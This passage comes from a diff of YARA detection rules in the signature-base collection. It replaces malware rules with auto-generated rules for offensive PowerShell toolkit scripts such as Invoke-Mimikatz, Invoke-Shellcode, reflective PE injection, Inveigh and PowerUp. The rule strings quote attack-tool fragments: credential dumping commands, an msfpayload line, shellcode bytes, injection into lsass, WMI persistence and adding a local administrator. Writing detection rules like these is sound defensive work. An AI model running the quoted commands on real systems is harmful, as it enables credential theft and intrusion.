+		$s1 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list vdir /text:vdir.name\" | % { " fullword ascii
+		$s2 = "iex \"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe list apppools /text:name\" | % { " fullword ascii
+		$s3 = "if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {" fullword ascii
+		$s4 = "C:\\Windows\\System32\\InetSRV\\appcmd.exe list vdir /text:physicalpath | " fullword ascii
+		$s5 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\inetsrv\\appcmd.exe\"))" fullword ascii
+		$s6 = "if (Test-Path  (\"$Env:SystemRoot\\System32\\InetSRV\\appcmd.exe\")) {" fullword ascii
+		$s7 = "Write-Verbose \"Executing command '$Cmd'\"" fullword ascii
+		$s8 = "Write-Warning \"[!] Target service" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 3 of them )
+		( uint16( 0 ) == 0xbbef and filesize < 4000KB and 1 of them ) or ( 3 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_THOR_Unsigned_Oct23_1 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce : FILE
 {
 	meta:
-		description = "Detects unsigned version of THOR scanner, which could be a backdoored / modified version of the scanner"
-		author = "Florian Roth"
-		id = "2ca6a192-675e-5f02-a7b1-40369eeb9904"
-		date = "2023-10-28"
+		description = "Auto-generated rule - file Inveigh-BruteForce.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cdc298d3-f9ac-5472-bdc9-0dc51ad91e4a"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unsigned_thor.yar#L4-L22"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L33-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12303e3549071dd6c8896f7a1222eb5905f6b4d3f320134416a5b6d53857adeb"
-		score = 75
+		logic_hash = "b23b6ad66e054e435415464262004ead6e7ee121185d76c02110506293b3867b"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$s1 = "THOR APT Scanner" wide fullword
-		$s2 = "Nextron Systems GmbH" wide fullword
-		$sc1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 74 00 68 00 6F 00 72 }
+		$s1 = "Import-Module .\\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 " fullword ascii
+		$s2 = "$(Get-Date -format 's') - Attempting to stop HTTP listener\")|Out-Null" fullword ascii
+		$s3 = "Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures == 0
+		( uint16( 0 ) == 0xbbef and filesize < 300KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Win32_Buzus_Softpulse : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Shellcode : FILE
 {
 	meta:
-		description = "Trojan Buzus / Softpulse"
+		description = "Auto-generated rule - file Invoke-Shellcode.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b555916-030a-5773-b2f1-e995fc81b697"
-		date = "2015-05-13"
+		id = "193d64b6-ffba-55fb-ab95-9c78552b8d68"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_buzus_softpulse.yar#L2-L26"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L51-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2f6df200e63a86768471399a74180466d2e99ea9"
-		logic_hash = "49625594db57e9d629860970c20493b76e554addc2edb41adba64673a820a94b"
-		score = 75
+		logic_hash = "03e9a8c5e45781d73fd13c331d82802a18e4255b506e896019d6f08c5a67dedf"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "24abe9f3f366a3d269f8681be80c99504dea51e50318d83ee42f9a4c7435999a"
 
 	strings:
-		$x1 = "pi4izd6vp0.com" fullword ascii
-		$s1 = "SELECT * FROM Win32_Process" fullword wide
-		$s4 = "CurrentVersion\\Uninstall\\avast" fullword wide
-		$s5 = "Find_RepeatProcess" fullword ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" wide
-		$s7 = "myapp.exe" fullword ascii
-		$s14 = "/c ping -n 1 www.google" wide
+		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "Get-ProcAddress kernel32.dll OpenProcess" fullword ascii
+		$s3 = "msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread C | sed '1,6d;s/[\";]//g;s/\\\\/,0/g' | tr -d '\\n' | cut -c2- " fullword ascii
+		$s4 = "inject shellcode into" ascii
+		$s5 = "Injecting shellcode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $x1 and 2 of ( $s* ) ) or all of ( $s* ) )
+		( uint16( 0 ) == 0xbbef and filesize < 90KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Bernhardpos
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz : FILE
 {
 	meta:
-		description = "BernhardPOS Credit Card dumping tool"
-		author = "Nick Hoffman / Jeremy Humble"
-		id = "9b9e1507-cf1b-5653-beaa-458205e367c3"
-		date = "2015-07-14"
+		description = "Auto-generated rule - file Invoke-Mimikatz.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c0252a1-fbe4-5519-949b-285073abb21f"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bernhard_pos.yar#L1-L18"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L71-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e49820ef02ba5308ff84e4c8c12e7c3d"
-		logic_hash = "c00f2fda5a391b44767d918945069f18cef084dd4dc6aa94d8f945bf97ac462a"
-		score = 70
+		logic_hash = "0bca6245befb5183f6a45406823c45267b0a31fb0d4505606b98025f6494f2cc"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
 
 	strings:
-		$shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? }
-		$mutex_name = "OPSEC_BERNHARD"
-		$build_path = "C:\\bernhard\\Debug\\bernhard.pdb"
-		$string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d }
+		$s1 = "Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId" fullword ascii
+		$s3 = "privilege::debug exit" ascii
+		$s4 = "Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" fullword ascii
+		$s5 = "Invoke-Mimikatz -DumpCreds" fullword ascii
+		$s6 = "| Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 1 of them ) or ( 3 of them )
 }
-
-rule SIGNATURE_BASE_SUSP_Xored_URL_In_EXE : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Relfectivepeinjection : FILE
 {
 	meta:
-		description = "Detects an XORed URL in an executable"
+		description = "Auto-generated rule - file Invoke-RelfectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f83991c8-f2d9-5583-845a-d105034783ab"
-		date = "2020-03-09"
-		modified = "2022-09-16"
-		reference = "https://twitter.com/stvemillertime/status/1237035794973560834"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_xor.yar#L4-L43"
+		id = "75ceb01e-103f-55b2-8362-42d22a35a36a"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L92-L111"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2113324ae04a9022be4cf5c615ad231206eeefb5aa87a2236ec3c9deee9e7ec2"
-		score = 50
+		logic_hash = "910b8b1dbc7306369f90eae0dfd5949347b2c41fa0eb5f590aed8e90e8db199a"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$s1 = "http://" xor
-		$s2 = "https://" xor
-		$f1 = "http://" ascii
-		$f2 = "https://" ascii
-		$fp01 = "3Com Corporation" ascii
-		$fp02 = "bootloader.jar" ascii
-		$fp03 = "AVAST Software" ascii wide
-		$fp04 = "smartsvn" wide ascii fullword
-		$fp05 = "Avira Operations GmbH" wide fullword
-		$fp06 = "Perl Dev Kit" wide fullword
-		$fp07 = "Digiread" wide fullword
-		$fp08 = "Avid Editor" wide fullword
-		$fp09 = "Digisign" wide fullword
-		$fp10 = "Microsoft Corporation" wide fullword
-		$fp11 = "Microsoft Code Signing" ascii wide
-		$fp12 = "XtraProxy" wide fullword
-		$fp13 = "A Sophos Company" wide
-		$fp14 = "http://crl3.digicert.com/" ascii
-		$fp15 = "http://crl.sectigo.com/SectigoRSACodeSigningCA.crl" ascii
-		$fp16 = "HitmanPro.Alert" wide fullword
+		$x1 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)" fullword ascii
+		$x2 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local" fullword ascii
+		$x3 = "} = Get-ProcAddress Advapi32.dll OpenThreadToken" ascii
+		$x4 = "Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local" fullword ascii
+		$s5 = "$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')" fullword ascii
+		$s6 = "= Get-ProcAddress Advapi32.dll AdjustTokenPrivileges" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( ( $s1 and #s1 > #f1 ) or ( $s2 and #s2 > #f2 ) ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		( uint16( 0 ) == 0xbbef and filesize < 700KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_2 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Persistence : FILE
 {
 	meta:
-		description = "Detects malware from Sednit Delphi Downloader report"
+		description = "Auto-generated rule - file Persistence.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6ccd2f21-de44-52fb-912e-d3ecbe57e389"
-		date = "2018-04-24"
+		id = "38115391-75ac-5ba8-b31b-dcf4c66179b0"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sednit_delphidownloader.yar#L11-L38"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L113-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32acbec3405007afce22b0521785439686338d4d3beb02a1d7b9005e49d87221"
-		score = 75
+		logic_hash = "bfe6b20fb712fcf7b45d0ef80075bc9a254867d2251109f377a378f887b38494"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda"
-		hash2 = "657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4"
-		hash3 = "5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182"
-		hash4 = "0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f"
-		hash5 = "72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$s1 = "2D444F574E4C4F41445F53544152542D" ascii
-		$s2 = "55504C4F41445F414E445F455845435554455F46494C45" ascii
-		$s3 = "4D6F7A696C6C612076352E31202857696E646F7773204E5420362E313B2072763A362E302E3129204765636B6F2F32303130303130312046697265666F782F36" ascii
-		$s4 = "41646F62654461696C79557064617465" ascii
-		$s5 = "53595354454D494E464F2026205441534B4C495354" ascii
-		$s6 = "6373727376632E657865" ascii
-		$s7 = "536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E" ascii
-		$s8 = "5C536F6674776172655C4D6963726F736F66745C57696E646F7773204E545C43757272656E7456657273696F6E" ascii
-		$s9 = "5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E" ascii
-		$s0 = "2D444F574E4C4F41445F53544152542D" ascii
-		$fp1 = "<key name=\"profiles\">"
+		$s1 = "\"`\"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```\"root\\subscription```" ascii
+		$s2 = "}=$PROFILE.AllUsersAllHosts;${" ascii
+		$s3 = "C:\\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup" ascii
+		$s4 = "= gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture" ascii
+		$s5 = "-eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))" ascii
+		$s6 = "}=$PROFILE.CurrentUserAllHosts;${" ascii
+		$s7 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+		$s8 = "[System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)" fullword ascii
 
 	condition:
-		filesize < 4000KB and 1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_MAL_Sednit_Delphidownloader_Apr18_3 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Invoke_Mimikatz_Relfectivepeinjection : FILE
 {
 	meta:
-		description = "Detects malware from Sednit Delphi Downloader report"
+		description = "Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2200fbdc-3600-51d4-a273-dc7fd4127c05"
-		date = "2018-04-24"
-		modified = "2023-01-06"
-		reference = "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sednit_delphidownloader.yar#L40-L62"
+		id = "e9471f95-48e1-57e0-b0be-f916c574a6a7"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L136-L162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20446692842ec9481f34dd976f6b309515c33159653f9988a59335d2f04e4138"
-		score = 75
+		logic_hash = "220597cb76c189adc33a9ac740c8164b52743f61523898aefb7a74206b23b76b"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "ecb835d03060db1ea3496ceca2d79d7c4c6c671c9907e0b0e73bf8d3371fa931"
-		hash2 = "e355a327479dcc4e71a38f70450af02411125c5f101ba262e8df99f9f0fef7b6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "5c31a2e3887662467cfcb0ac37e681f1d9b0f135e6dfff010aae26587e03d8c8"
+		hash2 = "510b345f821f93c1df5f90ac89ad91fcd0f287ebdabec6c662b716ec9fddb03a"
 
 	strings:
-		$ = "Processor Level: " fullword ascii
-		$ = "CONNECTION ERROR" fullword ascii
-		$ = "FILE_EXECUTE_AND_KILL_MYSELF" ascii
-		$ = "-KILL_PROCESS-" ascii
-		$ = "-FILE_EXECUTE-" ascii
-		$ = "-DOWNLOAD_ERROR-" ascii
-		$ = "CMD_EXECUTE" fullword ascii
-		$ = "\\Interface\\Office\\{31E12FE8-937F-1E32-871D-B1C9AOEF4D4}\\" ascii
-		$ = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s1 = "[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
+		$s2 = "if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)" fullword ascii
+		$s3 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)" fullword ascii
+		$s4 = "Function Import-DllInRemoteProcess" fullword ascii
+		$s5 = "FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))" fullword ascii
+		$s6 = "[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)" fullword ascii
+		$s7 = "[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)" fullword ascii
+		$s8 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null" fullword ascii
+		$s9 = "::FromBase64String('RABvAG4AZQAhAA==')))" ascii
+		$s10 = "Write-Verbose \"PowerShell ProcessID: $PID\"" fullword ascii
+		$s11 = "[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
+		( uint16( 0 ) == 0xbbef and filesize < 10000KB and 3 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Octowave_Installer_03_2025 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_2 : FILE
 {
 	meta:
-		description = "Detects resources embedded within Octowave Loader MSI installers"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "56685a0a-523d-4060-a008-aa28542cb85c"
-		date = "2025-03-28"
-		modified = "2025-04-08"
-		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_installer_mar25.yar#L1-L36"
+		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1319b03d-67e8-5155-8037-e3375e39f6a0"
+		date = "2016-09-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L164-L181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14b6247cf619ecb8f14fc0a860fa4285e58db2defa15488cda1b2431b3e3e980"
-		score = 75
-		quality = 60
+		logic_hash = "5c035898a9574e2516cbc66efcf57f7380fd979c4a5099f8a0a190ad21af32c0"
+		score = 80
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05b025b8475c0acbc9a5d2cd13c15088a2fb452aa514d0636f145e1c4c93e6ee"
-		hash2 = "500462c4fb6e4d0545f04d63ef981d9611b578948e5cfd61d840ff8e2f206587"
-		hash3 = "5ee9e74605b0c26b39b111a89139d95423e54f7a54decf60c7552f45b8b60407"
-		hash4 = "76efc8c64654d8f2318cc513c0aaf0da612423b1715e867b4622712ba0b3926f"
-		hash5 = "c3e2af892b813f3dcba4d0970489652d6f195b7985dc98f08eaddca7727786f0"
-		hash6 = "d7816ba6ddda0c4e833d9bba85864de6b1bd289246fcedae84b8a6581db3f5b6"
-		hash7 = "e93969a57ef2a7aee13a159cbf2015e2c8219d9153078e257b743d5cd90f05cb"
-		hash8 = "45984ae78d18332ecb33fe3371e5eb556c0db86f1d3ba8a835b72cd61a7eeecf"
+		hash1 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$string1 = "LaunchConditionsValidateProductIDProcessComponentsUnpublishFeaturesRemoveFilesRegisterUserRegisterProductInstalled OR PhysicalMemory >= 2048" ascii
-		$string2 = ".cab" ascii
-		$string3 = ".wav" ascii
-		$string4 = ".dll" ascii
-		$supporting1 = ".raw" ascii
-		$supporting2 = ".db" ascii
-		$supporting3 = ".pak" ascii
-		$supporting4 = ".bin" ascii
-		$supporting5 = ".bak" ascii
-		$supporting6 = ".dat" ascii
+		$s1 = "}.NTLMv2_file_queue[0]|Out-File ${" ascii
+		$s2 = "}.NTLMv2_file_queue.RemoveRange(0,1)" ascii
+		$s3 = "}.NTLMv2_file_queue.Count -gt 0)" ascii
+		$s4 = "}.relay_running = $false" ascii
 
 	condition:
-		( uint32( 0 ) == 0xe011cfd0 ) and filesize < 200000KB and all of ( $string* ) and 1 of ( $supporting* )
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Tempracer : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Powerup_2 : FILE
 {
 	meta:
-		description = "Detects privilege escalation tool - file TempRacer.exe"
+		description = "Auto-generated rule - from files PowerUp.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edba6471-9720-5aad-8c15-386197700c83"
-		date = "2016-03-30"
+		id = "11322a66-67d4-574b-acef-35d06e6f95f4"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_tempracer.yar#L10-L27"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L183-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e17d80c4822d16371d75e1440b6ac44af490b71fbee1010a3e8a5eca94d22bb3"
-		logic_hash = "37355456e13ea9fa6429b68970e0450f4ddbd8da81c070a0383b1e048a05e35a"
-		score = 75
+		logic_hash = "8cbd86f103d8b49e72787cbb85fc97e6a02d5332039ce29359cb673c273760b7"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc65ec85dbcd49001e6037de9134086dd5559ac41ac4d1adf7cab319546758ad"
 
 	strings:
-		$s1 = "\\obj\\Release\\TempRacer.pdb" ascii
-		$s2 = "[+] Injecting into " fullword wide
-		$s3 = "net localgroup administrators alex /add" fullword wide
-		$s4 = "[+] File: {0} renamed to {1}" fullword wide
-		$s5 = "[+] Blocking " fullword wide
+		$s1 = "if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::" ascii
+		$s2 = "FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {" ascii
+		$s3 = "$Null = Invoke-ServiceStart" ascii
+		$s4 = "Write-Warning \"[!] Access to service $" ascii
+		$s5 = "} = $MyConString.Split(\"=\")[1].Split(\";\")[0]" ascii
+		$s6 = "} += \"net localgroup ${" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 25KB and 1 of them ) or ( 4 of them )
+		( uint16( 0 ) == 0xbbef and filesize < 2000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_MAL_Shellcode_Loader_Apr23
+rule SIGNATURE_BASE_Ps1_Toolkit_Persistence_2 : FILE
 {
 	meta:
-		description = "Detects Shellcode loader as seen being used by Gopuram backdoor"
-		author = "X__Junior (Nextron Systems)"
-		id = "363b67d6-9cac-513d-a545-1f256667bab8"
-		date = "2023-04-03"
+		description = "Auto-generated rule - from files Persistence.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d79c328b-4471-52bb-882c-12d2e1302c1e"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L3-L18"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L204-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4e423158757c80b5e4e77f6a343323a87798c6697cf6a832aa01a146712b250"
+		logic_hash = "47d1c3593edeba02e1c08cc53b4ba3d375b73dd04816b84e807e28be2bcf917e"
 		score = 80
 		quality = 85
-		tags = ""
-		hash1 = "6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad"
-		hash2 = "b56279136d816a11cf4db9fc1b249da04b3fa3aef4ba709b20cdfbe572394812"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1a4dd18b481471fc25adea6a91982b7ffed1c2d393c8c17e6e542c030ac6cbd"
 
 	strings:
-		$op1 = { 41 C1 CB 0D 0F BE 03 48 FF C3 44 03 D8 80 7B ?? 00 75 ?? 41 8D 04 13 3B C6 74 }
-		$op2 = { B9 49 F7 02 78 4C 8B E8 E8 ?? ?? ?? ?? B9 58 A4 53 E5 48 89 44 24 ?? E8 ?? ?? ?? ?? B9 10 E1 8A C3 48 8B F0 E8 ?? ?? ?? ?? B9 AF B1 5C 94 48 89 44 24 ?? E8 }
+		$s1 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')" ascii
+		$s2 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')" ascii
